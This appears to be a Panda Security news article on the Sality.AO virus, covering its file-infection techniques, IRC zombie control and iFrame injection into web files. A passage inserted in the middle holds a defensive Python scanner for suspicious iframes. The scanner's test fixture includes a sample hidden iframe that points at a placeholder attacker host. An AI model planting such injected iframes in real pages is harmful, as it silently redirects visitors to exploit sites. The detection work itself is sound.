Malware goes retro with the spread of the Sality.AO virus


Panda Security’s malware detection and analysis laboratory has noted an increase in the number of infections caused by Sality.AO, a virus that combines the features of traditional viruses (infecting files and damaging as many computers as possible to win notoriety for their creators) with the objectives of new malware, i.e. generating financial returns for cyber-criminals. The global security vendor is therefore advising users to be on their guard against a potentially massive attack.

“Sality.AO uses some techniques which haven’t been seen for years, such as EPO or Cavity,” says Jeremy Matthews, the head of Panda Security’s sub-Saharan operations. “These techniques relate to the way in which the original file is modified in order to infect it, making it more difficult to detect these changes and to disinfect it. EPO allows part of a legitimate file to be run before infection starts, making it difficult to detect the malware, while Cavity involves inserting the virus code in blank spaces within the legitimate file’s code, making it both more difficult to locate and to disinfect infected files.”

Matthews says that these techniques are far more complex than those that can be achieved with automatic malware creation tools, which have been responsible for much of the recent increase in the number of threats in circulation. They require much greater skill and knowledge of malicious code programming.

In addition to these techniques associated with early malware, Sality.AO includes a series of features associated with new malware trends, such as the ability to connect to IRC channels to receive remote commands, which could potentially turn the infected computer into a zombie. Such zombie computers can be used for sending spam, distributing malware and launching denial-of-service attacks.

Similarly, infections are not restricted to files, as was the case with old viruses, but also look to propagate across the Internet, in line with new trends. To this end, the virus inserts an iFrame into PHP, ASP and .HTML files on the computer. The result is that when any of these files is opened, the browser is redirected, without the user’s knowledge, to a malicious page that launches an exploit against the computer in order to download more malware.

If any of the infected files are posted on a webpage – bearing in mind that these file types are typically uploaded to the Web – any users downloading the files or visiting the webpages will become infected.
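The article describes the web-side symptom of an infection (an iFrame injected into PHP, ASP and HTML files) without showing what a check for it looks like. The following scanner is an added example, not code from Panda or from the article: it walks a directory of web files and flags every iframe that either points at a host outside an administrator-supplied trusted list or is hidden from the visitor (zero size or CSS hiding). Those two heuristics are this example’s own assumption about what an injected redirect iframe looks like; the article does not state the exact markup Sality.AO writes. The sample pages and the host name `malicious.example` are constructed for the demonstration.

```python
"""Flag suspicious <iframe> tags in PHP/ASP/HTML files (added defensive example)."""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# File types the article says the virus injects into (.htm added for completeness).
WEB_EXTENSIONS = {".php", ".asp", ".html", ".htm"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Attributes that make an iframe invisible to the visitor: zero width/height or CSS hiding.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0(?!\d)|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)


def iframe_findings(content, trusted_hosts=frozenset()):
    """Return one finding per iframe that points off-site or is hidden.

    A relative src (same site) is not off-site; an absolute or protocol-relative
    src is off-site unless its host is in trusted_hosts. Hidden iframes are
    flagged regardless of host.
    """
    findings = []
    for match in IFRAME_RE.finditer(content):
        tag = match.group(0)
        src_match = SRC_RE.search(tag)
        src = src_match.group(1) if src_match else ""
        host = ""
        if src.lower().startswith(("http://", "https://", "//")):
            host = (urlparse(src).hostname or "").lower()
        off_site = bool(host) and host not in trusted_hosts
        hidden = bool(HIDDEN_RE.search(tag))
        if off_site or hidden:
            line = content.count("\n", 0, match.start()) + 1  # 1-based line number
            findings.append(
                {"line": line, "src": src, "host": host,
                 "off_site": off_site, "hidden": hidden, "tag": tag}
            )
    return findings


def scan_tree(root, trusted_hosts=frozenset()):
    """Scan every web file under root; return {path: findings} for files with hits."""
    results = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        found = iframe_findings(text, trusted_hosts)
        if found:
            results[str(path)] = found
    return results


# Constructed sample: a legitimate page embedding a same-site iframe.
CLEAN_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="/embed/map.html" width="400" height="300"></iframe>
</body></html>
"""

# Constructed sample of the kind of injection the article describes: an invisible
# iframe appended after the legitimate markup, pointing at a placeholder attacker host.
INFECTED_PAGE = CLEAN_PAGE + (
    '<iframe src="http://malicious.example/loader" width=0 height=0 '
    'style="display:none"></iframe>\n'
)


def demo_scan():
    """Write the constructed samples to a temp dir, scan it, return {basename: findings}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text(INFECTED_PAGE)
        (root / "about.php").write_text(CLEAN_PAGE)
        (root / "notes.txt").write_text(INFECTED_PAGE)  # not a web file type: ignored
        results = scan_tree(root, trusted_hosts=frozenset({"video.example"}))
        return {Path(p).name: f for p, f in results.items()}


if __name__ == "__main__":
    for name, hits in demo_scan().items():
        for hit in hits:
            print(f"{name}:{hit['line']} off_site={hit['off_site']} "
                  f"hidden={hit['hidden']} src={hit['src']}")
```

The trusted-host list keeps legitimate third-party embeds (a video provider, a map service) out of the report, while the hidden-iframe rule still catches an injection that points at an otherwise trusted host. Run it against a copy of the web root rather than the live site, and treat a hit as a reason to compare the file against a known-good backup, since a regex cannot prove the iframe is malicious on its own.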

The file downloaded through this technique is regarded by Panda as “hybrid malware”, as it combines the functions of Trojans and viruses. The Trojan also has downloader features for fetching other strains of malware onto the computer. The URLs used by this downloader were not yet operative at the time of Panda’s analysis, but they could become active as the number of infected computers increases.

“As we forecast in the annual PandaLabs report, the distribution of classic malicious code such as viruses will be a major trend in 2009. The use of increasingly sophisticated detection technologies like Panda Security’s Collective Intelligence, capable of detecting even low-level attacks and the newest malware techniques, will make cyber-crooks return to old codes, adapted to new needs. This means they won’t be viruses designed simply to spread or damage computers, as they were 10 years ago, but will be designed, such as in this case, to hide Trojans or turn computers into zombies,” concludes Matthews.